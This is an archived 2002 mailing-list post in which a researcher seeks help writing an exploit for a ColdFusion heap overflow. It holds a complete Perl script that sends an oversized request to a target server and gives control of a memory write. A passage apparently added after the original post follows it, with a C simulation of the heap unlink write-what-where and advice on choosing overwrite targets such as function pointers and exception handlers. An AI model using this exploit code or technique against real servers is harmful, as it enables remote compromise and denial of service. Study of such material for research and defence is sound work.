
ColdFusion Heap Overflow

From: Gary O'leary-Steele <garyo(at)sec-1.com>
Date: Thu Nov 14 2002 - 06:31:10 EST


Hi all,

I need some help with a subject I have been trying to get my head round for some time. I am attempting to write exploit code for the recent ColdFusion heap overflow discovered by eEye. I don't fully understand heap overflows, but here is where I'm at.

I can control the following values within the following instruction:

    mov [ecx], eax

where ecx and eax can be any value I specify. Thinking back to the .asp chunked transfer overflow, many people talked about and implemented exploits which overwrite the structured exception handler to gain EIP. Due to the fact that my area is stack overflows, I started by trying to overwrite the saved RET by specifying its location in [ecx] and the required value in eax. However, this just caused the program to crash in a different place, and the value in EBP was nowhere near where it was at the mov [ecx],eax instruction.

I am looking for the following:

How is the exception handler overwritten? Is it in a static place, etc.?

Papers or advice on exploiting this type of vulnerability.

Or any ideas using what I already have.

The following is the code I am currently using to overwrite the values in ecx and eax (ecx = 0x42424242, eax = 0x41414141):

    #!/usr/bin/perl
    # Coldfusion HEAP overflow
    # Sends one oversized .cfm request. The marker bytes in $len5 are the
    # ones that end up in ecx ("BBBB" = 0x42424242) and eax ("AAAA" =
    # 0x41414141) at the mov [ecx],eax instruction.
    use strict;
    use warnings;
    use Socket;

    if (@ARGV < 1) {
        die "\nCold Fusion Heap Overflow.\n Usage = IP/host:Port e.g. perl $0 www.target.com\n";
    }
    my ($host, $port) = split(/:/, $ARGV[0]);
    $port = 80 unless $port;
    my $target = inet_aton($host) or die("Cannot resolve $host\n");

    ###################
    my $len1 = "A" x 1000;
    my $len2 = "B" x 1000;
    my $len3 = "C" x 1000;
    my $len4 = "D" x 1000;
    ###################
    my $len5 = "E" x 119;
    # "BBBB" lands in ecx, "AAAA" lands in eax
    $len5 = $len5 . "BBBB" . "AAAA" . "e" x 175 . "n" x 175;
    my $len6 = "X" x 500;
    my $len  = $len1 . $len2 . $len3 . $len4 . $len5 . $len6;

    my $getreq = 'GET /' . $len . '.cfm' . ' HTTP/1.0';

    my $padrequest =
        $getreq . "\r\n" .
        'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*' . "\r\n" .
        'Accept-Language: en-gb' . "\r\n" .
        'Accept-Encoding: gzip, deflate' . "\r\n" .
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.1.4322)' . "\r\n" .
        'Host: ' . $host . "\r\n" .
        'Connection: Keep-Alive' . "\r\n\r\n";

    my @result = sendraw($padrequest);
    print $padrequest;
    print length($padrequest), "\n";
    #print @result;

    # Sends the raw request and returns every line of the response
    # (this saves the whole transaction anyway).
    sub sendraw {
        my ($pstr) = @_;
        socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
            || die("Socket problems\n");
        if (connect(S, sockaddr_in($port, $target))) {
            my @in;
            select(S); $| = 1; print $pstr;
            while (<S>) { push @in, $_; }
            select(STDOUT); close(S); return @in;
        } else {
            die("Can't connect...\n");
        }
    }

Thanks in advance.


Kind Regards
Gary
Sec-1

Received on Thu Nov 14 12:06:35 2002
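The primitive described in the post (a mov [ecx],eax where both registers are attacker-chosen) is what a corrupted doubly linked free list hands you when the allocator unlinks a chunk: fd->bk = bk; bk->fd = fd. The simulation below is an added example and is not code from the post, from Sec-1 or from eEye; it does not claim that the ColdFusion bug reaches its write through this exact path, only that this is the classic source of such a write in heap overflows of this era. Memory is a flat array of words, chunk layout ([size][fd][bk][data]) and the word indices (chunk_a at 10, a function-pointer slot at 40, the list head at 4) are constructed for the demo. Two things the simulation makes visible that the bare instruction does not: the unlink performs a second, collateral write at what + BK_OFF, so the value you write must itself be a writable address; and both writes execute inside the allocator's free path, not in the frame of the function that overflowed.

```c
/* Simulation of the classic free-list "unlink" write-what-where.
 * Memory is a flat array of machine words so everything is defined
 * behaviour and can be stepped through in a debugger or a unit test. */
#include <stdio.h>
#include <stddef.h>

#define MEM_WORDS 64
typedef unsigned long word;

/* Chunk layout in words: [size][fd][bk][data ...]  (constructed layout) */
enum { SIZE_OFF = 0, FD_OFF = 1, BK_OFF = 2, HDR_WORDS = 3 };

/* The unlink step a free-list allocator performs when removing a chunk
 * from its doubly linked list:  fd->bk = bk;  bk->fd = fd;
 * With fd and bk taken from an overflowed header, the second statement
 * is exactly "mov [ecx], eax" with ecx = bk + FD_OFF and eax = fd.
 * Returns 0 on success, -1 if either write would leave simulated memory
 * (the real-world equivalent is an access violation on a bad address). */
static int sim_unlink(word *mem, word p)
{
    word fd = mem[p + FD_OFF];
    word bk = mem[p + BK_OFF];
    if (fd + BK_OFF >= MEM_WORDS || bk + FD_OFF >= MEM_WORDS)
        return -1;
    mem[fd + BK_OFF] = bk;  /* write 1: collateral, lands at what + BK_OFF */
    mem[bk + FD_OFF] = fd;  /* write 2: *(where) = what                    */
    return 0;
}

/* The bug: copy n words into a chunk's data area with no size check,
 * so a long payload runs straight into the next chunk's header. */
static void copy_unchecked(word *mem, word chunk, const word *src, size_t n)
{
    for (size_t i = 0; i < n && chunk + HDR_WORDS + i < MEM_WORDS; i++)
        mem[chunk + HDR_WORDS + i] = src[i];
}

/* Lays out two adjacent chunks, overflows A into B's fd/bk, then "frees" B.
 * Returns the word found at `target` afterwards, or 0 if the unlink faulted.
 * `target` and `what` are simulated addresses (word indices). */
word run_unlink_attack(word target, word what)
{
    word mem[MEM_WORDS] = {0};
    const word a_data    = 4;
    const word chunk_a   = 10;
    const word chunk_b   = chunk_a + HDR_WORDS + a_data;   /* 17 */
    const word list_head = 4;

    mem[chunk_a + SIZE_OFF] = a_data;
    mem[chunk_b + SIZE_OFF] = 4;
    mem[chunk_b + FD_OFF]   = list_head;   /* B sits on the free list */
    mem[chunk_b + BK_OFF]   = list_head;
    mem[list_head + FD_OFF] = chunk_b;
    mem[list_head + BK_OFF] = chunk_b;

    /* Constructed payload: four words fill A's data area, the next three
     * overwrite B's size, fd and bk. */
    word payload[7] = {
        0x41414141, 0x41414141, 0x41414141, 0x41414141,
        4,                  /* keep B's size sane                      */
        what,               /* fd := value to write        (eax)       */
        target - FD_OFF,    /* bk := destination - FD_OFF  (ecx-FD_OFF) */
    };
    copy_unchecked(mem, chunk_a, payload, 7);

    if (sim_unlink(mem, chunk_b) != 0)
        return 0;
    return mem[target];
}

int main(void)
{
    word fptr_slot = 40;   /* stands in for any pointer the program will call */
    printf("mem[%lu] = %lu after the unlink\n",
           fptr_slot, run_unlink_attack(fptr_slot, 33));
    /* what = 62 is not writable in the simulation: the collateral write
     * faults, just as a non-writable "what" address faults for real. */
    printf("what = 62 -> %s\n",
           run_unlink_attack(fptr_slot, 62) ? "written" : "faulted");
    return 0;
}
```

Choosing `where` is the part the post is stuck on: the slot has to be something the process will read and act on after free() returns (a function pointer, a vtable entry, an exception handler record), and it has to be at an address you know in advance. A saved return address in the overflowed function's frame is a poor fit here because the write happens inside the allocator, and because stack addresses move between threads and requests.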

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT

